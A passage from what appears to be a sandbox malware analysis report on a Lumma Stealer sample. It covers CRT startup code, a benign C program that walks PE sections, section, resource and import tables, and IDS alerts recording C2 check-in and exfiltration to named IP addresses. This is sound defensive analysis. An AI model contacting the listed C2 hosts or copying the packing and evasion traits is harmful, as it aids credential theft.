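The listing above is the start of the entry-point region, and it is compiler runtime code rather than the stealer's own logic. The first routine follows e_lfanew at image offset 0x3C to the NT headers, reads SizeOfOptionalHeader (+0x14) and NumberOfSections (+0x06), then scans the 0x28-byte section headers and returns the one whose VirtualAddress..VirtualAddress+VirtualSize range contains the RVA passed in [ebp+0Ch], or 0 if none does; this is the shape of the MSVC CRT's `_FindPESection` helper. The routine after it spins on `lock cmpxchg` against a global (004C3C38h) with the current thread's TEB StackBase (fs:[18h], then +4) as the owner token, and the one after that sets a global byte (004C3C3Ch) when its argument is 0, calls one initialiser, then two more whose boolean results are tested, calling an uninitialise routine with argument 0 if the last one fails: the `__scrt_acquire_startup_lock` and `__scrt_initialize_crt` pattern of the same CRT, consistent with the VS2015 fingerprint below. The following C program is an added example written for this page, not code from the sample or from Joe Sandbox. It reimplements the section walk instruction for instruction and runs it against a constructed header-only image built from this report's section table, so the data-directory RVAs can be checked against the "Is in Section" column. It also adds the one check the CRT routine has no reason to perform, the gap between the end of section data and the IMAGE_DIRECTORY_ENTRY_SECURITY file offset. The PointerToRawData values (contiguous from 0x400) are an assumption, since the report does not print that column.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define SEC_HDR_SIZE 0x28u  /* sizeof(IMAGE_SECTION_HEADER) */

/* Little-endian accessors: no <windows.h>, no host-endianness dependence. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                                                ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* C rendering of the disassembled routine. Returns the IMAGE_SECTION_HEADER whose
 * [VirtualAddress, VirtualAddress + VirtualSize) range contains rva, or NULL. Like the original
 * it trusts e_lfanew and NumberOfSections: fine for a loaded module, not for an untrusted file. */
const uint8_t *find_pe_section(const uint8_t *image_base, uint32_t rva)
{
    const uint8_t *nt  = image_base + rd32(image_base + 0x3C);         /* ecx = base + e_lfanew */
    const uint8_t *sec = nt + 0x18 + rd16(nt + 0x14);                  /* edx = first section header */
    const uint8_t *end = sec + (size_t)rd16(nt + 0x06) * SEC_HDR_SIZE; /* esi = edx + NumberOfSections * 0x28 */
    for (; sec != end; sec += SEC_HDR_SIZE) {                           /* loop is entered at "cmp edx, esi" */
        uint32_t va = rd32(sec + 0x0C);                                 /* ecx = VirtualAddress */
        if (rva < va) continue;                                         /* cmp [ebp+0Ch], ecx ; jc next */
        if (rva < va + rd32(sec + 0x08)) return sec;                    /* eax = VirtualSize + va ; jc found */
    }
    return NULL;                                                        /* xor eax, eax */
}

/* Bytes between the end of the last section's raw data and the file offset stored in
 * IMAGE_DIRECTORY_ENTRY_SECURITY: an overlay the loader never maps and the signature does not cover. */
uint32_t overlay_before_certificate(const uint8_t *image_base, uint32_t security_file_offset)
{
    const uint8_t *nt  = image_base + rd32(image_base + 0x3C);
    const uint8_t *sec = nt + 0x18 + rd16(nt + 0x14);
    uint32_t end_of_sections = 0;
    for (uint16_t i = 0, n = rd16(nt + 0x06); i < n; i++, sec += SEC_HDR_SIZE) {
        uint32_t raw_end = rd32(sec + 0x14) + rd32(sec + 0x10);         /* PointerToRawData + SizeOfRawData */
        if (raw_end > end_of_sections) end_of_sections = raw_end;
    }
    return security_file_offset > end_of_sections ? security_file_offset - end_of_sections : 0;
}

/* Constructed header-only image. Name, VirtualAddress, VirtualSize and Raw Size are copied from this
 * report's section table; PointerToRawData is an ASSUMPTION (contiguous from 0x400), not reported. */
struct sec_desc { const char *name; uint32_t va, vsize, rawsize; };
static const struct sec_desc kSections[] = {
    { ".text",  0x1000,  0x949aa, 0x94a00 },
    { ".rdata", 0x96000, 0x286e4, 0x28800 },
    { ".data",  0xbf000, 0x9f1c,  0x2e00  },
    { ".rsrc",  0xc9000, 0x8230,  0x8400  },
    { ".reloc", 0xd2000, 0x5d000, 0x5d000 },
};
#define NSEC (sizeof kSections / sizeof kSections[0])
static uint8_t g_image[1024];

const uint8_t *build_header_only_image(void)
{
    memset(g_image, 0, sizeof g_image);
    g_image[0] = 'M'; g_image[1] = 'Z';
    wr32(g_image + 0x3C, 0x80);                   /* e_lfanew */
    uint8_t *nt = g_image + 0x80;
    memcpy(nt, "PE\0\0", 4);
    wr16(nt + 0x04, 0x14c);                       /* Machine = IMAGE_FILE_MACHINE_I386 */
    wr16(nt + 0x06, (uint16_t)NSEC);              /* NumberOfSections */
    wr16(nt + 0x14, 0xE0);                        /* SizeOfOptionalHeader for PE32 */
    uint8_t *sec = nt + 0x18 + 0xE0;
    uint32_t raw_ptr = 0x400;                     /* assumed offset of the first section's raw data */
    for (size_t i = 0; i < NSEC; i++, sec += SEC_HDR_SIZE) {
        memcpy(sec, kSections[i].name, strlen(kSections[i].name)); /* Name[8], NUL padded */
        wr32(sec + 0x08, kSections[i].vsize);
        wr32(sec + 0x0C, kSections[i].va);
        wr32(sec + 0x10, kSections[i].rawsize);
        wr32(sec + 0x14, raw_ptr);
        raw_ptr += kSections[i].rawsize;
    }
    return g_image;
}

/* Section name holding rva in the constructed image, or "" for header space / past the end. */
const char *section_name_for_rva(uint32_t rva)
{
    static char name[9];
    const uint8_t *sec = find_pe_section(build_header_only_image(), rva);
    if (!sec) return "";
    memcpy(name, sec, 8); name[8] = '\0';
    return name;
}

int main(void)
{
    const uint32_t probes[] = { 0xbc0c4, 0x96000, 0xc9000, 0xd2000, 0x0, 0x12f000 }; /* from the data-directory table */
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("rva 0x%06x -> %s\n", (unsigned)probes[i], section_name_for_rva(probes[i]));
    printf("overlay before certificate table: 0x%x bytes\n", (unsigned)overlay_before_certificate(build_header_only_image(), 0x473d7d8));
    return 0;
}
```

On the report's layout, 0xbc0c4 (import directory) and 0x96000 (IAT) resolve to .rdata, 0xc9000 to .rsrc and 0xd2000 to .reloc, while 0x0 (header space) and 0x12f000 (the first byte past .reloc) resolve to no section, matching the "Is in Section" column. Under the assumed raw layout the overlay figure comes out near 73 MB. To run this on the real file, feed the header bytes read from disk instead of the constructed image and bounds-check e_lfanew and NumberOfSections against the file length before walking; the CRT routine skips that because it only ever inspects its own mapped module.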
                                                                                                                        Programming Language:
                                                                                                                        • [ C ] VS2015 UPD3.1 build 24215
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0c4 | 0x168 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc9000 | 0x8230 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x473d7d8 | 0x39c0 | - (a raw file offset, not an RVA)
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd2000 | 0x8224 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb4f50 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0xb4fc0 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb4e90 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x96000 | 0x700 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x949aa | 0x94a00 | 2f0b1e6e7209e42f721cc89975d96484 | False | 0.550125827901598 | zlib compressed data | 6.684942206445448 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x96000 | 0x286e4 | 0x28800 | 4d768e6b75d1f20ec35737ac3b3709fe | False | 0.3889551986882716 | data | 5.172232114590233 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbf000 | 0x9f1c | 0x2e00 | f0b1d2ae3052872b46593f307ac260ac | False | 0.31241508152173914 | DOS executable (block device driver) | 4.45629832023611 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc9000 | 0x8230 | 0x8400 | d5fc66a55ac86cebe4c9b4b54cc731b3 | False | 0.37621330492424243 | data | 4.741658203644316 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd2000 | 0x5d000 | 0x5d000 | 3c1bacd0947ddab54a3ad072fd7b6444 | False | 0.6855389994959677 | data | 7.55788260664986 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Two things in this table deserve attention. The .reloc section is 0x5d000 bytes with entropy 7.56, while the base-relocation directory it hosts is only 0x8224 bytes, so about 0x54ddc bytes of near-random data sit in .reloc beyond the relocations; that is consistent with the encrypted-string and packed-payload findings elsewhere in this report. The IMAGE_DIRECTORY_ENTRY_SECURITY offset 0x473d7d8 places the certificate table roughly 74 MB into the file, whereas the five sections total 0x125400 bytes of raw data, so the file carries a very large overlay between the last section and the signature. The File Type column is libmagic's guess on raw bytes: "zlib compressed data" and "DOS executable" on code and data sections carry no meaning.
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
AFX_DIALOG_LAYOUT | 0xca750 | 0x2 | data | English | United States | 5.0
AFX_DIALOG_LAYOUT | 0xca748 | 0x2 | data | English | United States | 5.0
RT_CURSOR | 0xcd580 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4805194805194805
RT_CURSOR | 0xcd6b8 | 0xb4 | Targa image data - Map 32 x 65536 x 1 +16 "\001" | English | United States | 0.7
RT_CURSOR | 0xcd798 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.36363636363636365
RT_CURSOR | 0xcd8e8 | 0x134 | Targa image data - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.35714285714285715
RT_CURSOR | 0xcda38 | 0x134 | data | English | United States | 0.37337662337662336
RT_CURSOR | 0xcdb88 | 0x134 | data | English | United States | 0.37662337662337664
RT_CURSOR | 0xcdcd8 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | English | United States | 0.36688311688311687
RT_CURSOR | 0xcde28 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | English | United States | 0.37662337662337664
RT_CURSOR | 0xcdf78 | 0x134 | Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.36688311688311687
RT_CURSOR | 0xce0c8 | 0x134 | Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0xce218 | 0x134 | data | English | United States | 0.44155844155844154
RT_CURSOR | 0xce368 | 0x134 | data | English | United States | 0.4155844155844156
RT_CURSOR | 0xce4b8 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | English | United States | 0.5422077922077922
RT_CURSOR | 0xce608 | 0x134 | data | English | United States | 0.2662337662337662
RT_CURSOR | 0xce758 | 0x134 | data | English | United States | 0.2824675324675325
RT_CURSOR | 0xce8a8 | 0x134 | data | English | United States | 0.3246753246753247
RT_BITMAP | 0xceb18 | 0xb8 | Device independent bitmap graphic, 12 x 10 x 4, image size 80 | English | United States | 0.44565217391304346
RT_BITMAP | 0xcebd0 | 0x144 | Device independent bitmap graphic, 33 x 11 x 4, image size 220 | English | United States | 0.37962962962962965
RT_ICON | 0xca898 | 0x1ca8 | Device independent bitmap graphic, 48 x 96 x 24, image size 6912 | Swedish | Sweden | 0.5331243184296619
RT_ICON | 0xcc540 | 0xca8 | Device independent bitmap graphic, 32 x 64 x 24, image size 3072 | Swedish | Sweden | 0.5916666666666667
RT_ICON | 0xcd1e8 | 0x368 | Device independent bitmap graphic, 16 x 32 x 24, image size 768 | Swedish | Sweden | 0.7362385321100917
RT_DIALOG | 0xc9cd0 | 0x168 | data | English | United States | 0.5861111111111111
RT_DIALOG | 0xc9e38 | 0x1e2 | data | English | United States | 0.5601659751037344
RT_DIALOG | 0xca020 | 0x37c | data | English | United States | 0.44506726457399104
RT_DIALOG | 0xca758 | 0x140 | data | Swedish | Sweden | 0.596875
RT_DIALOG | 0xce9f8 | 0xe8 | data | English | United States | 0.6336206896551724
RT_DIALOG | 0xceae0 | 0x34 | data | English | United States | 0.9038461538461539
RT_STRING | 0xced18 | 0xe0 | data | English | United States | 0.6741071428571429
RT_STRING | 0xcedf8 | 0x100 | data | English | United States | 0.44921875
RT_STRING | 0xceef8 | 0x82 | StarOffice Gallery theme p, 536899072 objects, 1st n | English | United States | 0.7153846153846154
RT_STRING | 0xcef80 | 0x2a | data | English | United States | 0.5476190476190477
RT_STRING | 0xcefb0 | 0x184 | data | English | United States | 0.48711340206185566
RT_STRING | 0xcf138 | 0x4ee | data | English | United States | 0.375594294770206
RT_STRING | 0xcf9b8 | 0x264 | data | English | United States | 0.3333333333333333
RT_STRING | 0xcf6d8 | 0x2da | data | English | United States | 0.3698630136986301
RT_STRING | 0xd0400 | 0x8a | data | English | United States | 0.6594202898550725
RT_STRING | 0xcf628 | 0xac | data | English | United States | 0.45348837209302323
RT_STRING | 0xd02f0 | 0xde | data | English | United States | 0.536036036036036
RT_STRING | 0xcfc20 | 0x4a8 | data | English | United States | 0.3221476510067114
RT_STRING | 0xd00c8 | 0x228 | data | English | United States | 0.4003623188405797
RT_STRING | 0xd03d0 | 0x2c | data | English | United States | 0.5227272727272727
RT_STRING | 0xd0490 | 0x53e | data | English | United States | 0.2965722801788376
RT_GROUP_CURSOR | 0xcd770 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States | 1.0294117647058822
RT_GROUP_CURSOR | 0xcdf60 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xcd8d0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xcde10 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xcdcc0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xce5f0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xcdb70 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xce200 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xcda20 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xce0b0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xce350 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xce4a0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xce740 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xce890 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0xce9e0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0xcd550 | 0x30 | data | Swedish | Sweden | 0.875
RT_VERSION | 0xca3a0 | 0x3a4 | data | English | United States | 0.4270386266094421
RT_MANIFEST | 0xd09d0 | 0x860 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (2084), with CRLF line terminators | English | United States | 0.3148320895522388

AFX_DIALOG_LAYOUT is an MFC-specific resource type, so the GUI shell is an MFC application. The three RT_ICON entries, the RT_GROUP_ICON and one RT_DIALOG are tagged Swedish/Sweden while every other resource is English/United States. The Type column is libmagic's guess on each raw blob: "Targa image", "AmigaOS bitmap font", "Lotus worksheet" and "StarOffice Gallery theme" are false identifications of ordinary 32x32 cursor, cursor-group and string-table data and should not be read as embedded files.
DLL | Import
VERSION.dll | VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
KERNEL32.dll | SetErrorMode, GlobalFlags, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GlobalReAlloc, GlobalHandle, LocalAlloc, LocalReAlloc, GetSystemDefaultUILanguage, GetFullPathNameW, GetVolumeInformationW, SetEndOfFile, GetFileAttributesExW, UnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetPrivateProfileStringW, InitializeSListHead, GetStartupInfoW, GetConsoleOutputCP, GetPrivateProfileIntW, ResumeThread, GetStringTypeW, GetCPInfo, GetFileAttributesA, CreateMutexA, RtlUnwind, CreateThread, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapQueryInformation, GetStdHandle, ExitProcess, LCMapStringW, GetDriveTypeW, GetTimeZoneInformation, IsValidCodePage, GetOEMCP, lstrcmpA, GetCurrentThread, CompareStringW, GlobalFindAtomW, GlobalAddAtomW, lstrcmpW, GlobalDeleteAtom, LoadLibraryA, LoadLibraryExW, GetSystemDirectoryW, EncodePointer, FormatMessageW, LocalFree, InitializeCriticalSectionAndSpinCount, GetACP, FindFirstFileExW, DosDateTimeToFileTime, SystemTimeToFileTime, GetFileType, DuplicateHandle, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, WritePrivateProfileStringW, DecodePointer, HeapAlloc, HeapReAlloc, HeapSize, InitializeCriticalSectionEx, HeapFree, OpenProcess, MapViewOfFile, CreateFileMappingW, IsBadReadPtr, UnmapViewOfFile, FlushFileBuffers, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, GetUserDefaultLangID, FindClose, FindNextFileW, FindFirstFileW, CompareFileTime, GetModuleHandleA, RemoveDirectoryW, SetFileTime, lstrcpynW, FileTimeToDosDateTime, IsDebuggerPresent, GetFileTime, VirtualQuery, GlobalMemoryStatus, GetSystemTimeAsFileTime, lstrcpyW, GetCurrentProcessId, GetLocalTime, FileTimeToLocalFileTime, GetSystemInfo, RaiseException, lstrcatW, OutputDebugStringW, GetUserDefaultUILanguage, GetModuleHandleW, GetLocaleInfoW, IsWow64Process, SetUnhandledExceptionFilter, ReleaseMutex, CreateMutexW, CreateProcessW, GetModuleFileNameW, GetCurrentProcess, VerifyVersionInfoW, VerSetConditionMask, MoveFileW, SetFileAttributesW, DeleteFileW, CreateDirectoryW, Sleep, GetLongPathNameW, GetTempPathW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFileAttributesW, GetVersionExW, lstrlenA, WinExec, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, GetWindowsDirectoryW, GetCurrentThreadId, OutputDebugStringA, WideCharToMultiByte, lstrlenW, SetEvent, GetFileSizeEx, GetFileSize, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, InitializeCriticalSection, CreateEventW, WriteFile, ReadFile, CloseHandle, SetFilePointer, CreateFileW, FindResourceW, LoadResource, LockResource, SizeofResource, GlobalFree, DebugBreak, GetLastError, WaitForSingleObject, MultiByteToWideChar, SetLastError, GetProcAddress, FreeLibrary, LoadLibraryW, GetConsoleMode, SetFilePointerEx, ReadConsoleW, QueryPerformanceCounter, WriteConsoleW
USER32.dll | AdjustWindowRectEx, GetWindowTextLengthW, GetWindowTextW, RemovePropW, GetPropW, SetPropW, GetScrollRange, SetScrollRange, GetScrollPos, ValidateRect, SetForegroundWindow, GetForegroundWindow, SetActiveWindow, TrackPopupMenu, SetMenu, GetMenu, SetFocus, GetDlgCtrlID, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPos, DestroyWindow, IsChild, IsMenu, CreateWindowExW, GetClassInfoExW, RegisterClassW, CallWindowProcW, GetMessageTime, GetMessagePos, PeekMessageW, DispatchMessageW, GetLastActivePopup, GetWindowLongW, IsWindowEnabled, GetMenuItemCount, GetMenuItemID, GetSubMenu, MapWindowPoints, EndPaint, BeginPaint, GetWindowDC, SendDlgItemMessageA, UnregisterClassW, GetWindowThreadProcessId, GetShellWindow, EqualRect, GetIconInfo, DrawIconEx, EnumChildWindows, ReleaseDC, CopyRect, ClientToScreen, GetCapture, CharPrevW, CharNextW, DrawEdge, OffsetRect, MessageBoxW, wvsprintfW, KillTimer, SetTimer, DrawIcon, IsIconic, PostQuitMessage, GetSystemMenu, LoadIconW, MoveWindow, GetDlgItem, GetWindowRect, GetDesktopWindow, wsprintfW, GetTabbedTextExtentW, GetSysColor, GrayStringW, DrawTextExW, TabbedTextOutW, UpdateWindow, EnableWindow, ScreenToClient, AppendMenuW, SetWindowLongW, GetClassLongW, GetTopWindow, GetWindow, SetWindowsHookExW, UnhookWindowsHookEx, CallNextHookEx, SetScrollInfo, GetScrollInfo, WinHelpW, MonitorFromWindow, GetMonitorInfoW, ShowWindow, CreatePopupMenu, SetCursor, GetFocus, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, SendMessageW, IsWindow, GetParent, ReleaseCapture, SetCapture, GetSystemMetrics, GetKeyState, CreateCaret, DestroyCaret, PostMessageW, IsWindowVisible, DefWindowProcW, GetClassInfoW, CopyIcon, LoadCursorW, RegisterWindowMessageW, SystemParametersInfoW, FillRect, SetRectEmpty, PtInRect, HideCaret, SetCaretPos, ShowCaret, GetClientRect, DrawTextW, SetWindowTextW, IsDialogMessageW, CheckMenuItem, EnableMenuItem, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, SetMenuItemInfoW, LoadBitmapW, DestroyMenu, CreateDialogIndirectParamW, EndDialog, GetNextDlgTabItem, GetActiveWindow, GetMessageW, TranslateMessage, GetCursorPos, CharUpperW, GetSysColorBrush, RealChildWindowFromPoint, RedrawWindow, WindowFromPoint, GetDC, InvalidateRect, GetTabbedTextExtentA, TabbedTextOutA, GetClassNameW
GDI32.dll | Escape, GetBrushOrgEx, SetBrushOrgEx, Rectangle, SetPixelV, CreatePatternBrush, GetCharABCWidthsW, GetTextMetricsW, DeleteDC, CreateBitmap, GetClipBox, RestoreDC, SaveDC, SetBkColor, SetBkMode, SetMapMode, ExtTextOutW, SetTextColor, SetViewportExtEx, SetViewportOrgEx, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, DPtoLP, RectVisible, TextOutW, PtVisible, CreateFontIndirectW, GetObjectW, GetDeviceCaps, BitBlt, GetBkColor, CreateCompatibleBitmap, CreateCompatibleDC, TextOutA, GetStockObject, Ellipse, LineTo, MoveToEx, SelectObject, CreateSolidBrush, CreatePen, GetTextExtentPoint32W, GetTextExtentPoint32A, DeleteObject
COMDLG32.dll | CommDlgExtendedError
WINSPOOL.DRV | OpenPrinterW, DocumentPropertiesW, ClosePrinter
ADVAPI32.dll | AdjustTokenPrivileges, RegQueryValueW, RegEnumValueW, RegEnumKeyW, RegDeleteValueW, RegDeleteKeyW, DuplicateTokenEx, RegOpenKeyExW, LookupPrivilegeValueW, GetUserNameW, RegSetValueExW, RegQueryValueExW, GetTokenInformation, OpenProcessToken, RegCreateKeyExW, RegCloseKey
SHELL32.dll | DragQueryFileW, DragFinish, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderPathW, ShellExecuteExW, SHBrowseForFolderW, DragAcceptFiles, SHGetMalloc, SHGetPathFromIDListW
COMCTL32.dll | (no named imports listed)
SHLWAPI.dll | PathRemoveFileSpecW, PathStripToRootW, PathFindExtensionW, PathFindFileNameW, PathIsUNCW, SHCopyKeyW
ole32.dll | CoUninitialize, CoCreateInstance, CoInitialize, CoTaskMemFree, CoCreateGuid, CoInitializeEx
OLEAUT32.dll | SysAllocString, VariantChangeType, VariantClear, VariantInit, SysFreeString
WS2_32.dll | WSAStartup, WSASetLastError, WSACleanup

Most of this import surface (VERSION, WINSPOOL, COMDLG32, the USER32/GDI32 window, menu and drawing set, the TLS and atom handling in KERNEL32) belongs to the MFC/CRT installer front end. The imports worth attention for triage are the clipboard set (OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard), IsDebuggerPresent with OutputDebugStringW/OutputDebugStringA, the token calls (OpenProcessToken, GetTokenInformation, LookupPrivilegeValueW, AdjustTokenPrivileges, DuplicateTokenEx), the process launchers (CreateProcessW, WinExec, ShellExecuteW/ShellExecuteExW) and the dynamic resolution trio LoadLibraryW/LoadLibraryExW/GetProcAddress. Nothing wallet-, browser- or WMI-specific is imported by name (WMI is reachable through the ole32 CoCreateInstance import alone), so the stealer-specific API use this report observes at run time is resolved dynamically, consistent with the "dynamically determine API calls" and string-decryption signatures.
                                                                                                                        NETAPI32.dllNetApiBufferFree, NetServerGetInfo
                                                                                                                        MPR.dllWNetAddConnection3W
                                                                                                                        dbghelp.dllMiniDumpWriteDump
                                                                                                                        OLEACC.dllCreateStdAccessibleObject, LresultFromObject
Language of compilation system | Country where language is spoken
English | United States
Swedish | Sweden
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-06T15:40:22.509497+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49749 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:23.125271+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49749 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:23.125271+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49749 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:23.593631+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49750 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:24.062654+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49750 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:24.062654+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49750 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:24.678803+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49751 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:25.482275+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49751 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:26.058271+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49752 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:27.378073+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49753 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:28.816189+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49754 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:29.767356+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49755 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:30.831235+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49756 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:31.320736+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49756 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:32.095620+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49757 | 185.161.251.21 | 443 | TCP
                                                                                                                        Jan 6, 2025 15:40:29.776649952 CET49755443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:29.776658058 CET44349755104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.289829969 CET44349755104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.289920092 CET44349755104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.289964914 CET49755443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.290113926 CET49755443192.168.2.4104.21.96.1
